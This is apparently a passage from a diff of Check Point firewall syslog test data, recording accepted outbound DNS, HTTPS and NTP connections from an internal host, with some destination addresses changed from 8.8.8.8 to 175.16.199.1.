sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503101"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47205"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503101"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38203"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36808"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49780"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51965"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34551"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51254"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49780"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51965"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34551"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51254"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58790"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59605"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] -<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42076"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59605"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42076"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46850"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37888"; service:"443"; service_id:"https"; src:"192.168.2.2"] 
-<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52594"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503106"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52971"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503106"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55167"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52594"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503106"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52971"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503106"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55167"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58650"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:49Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db85,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; log_delay:"1585503109"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35127"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db87,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503111"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57973"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db87,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503111"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59598"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db87,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503111"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57973"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db87,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503111"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59598"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db88,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
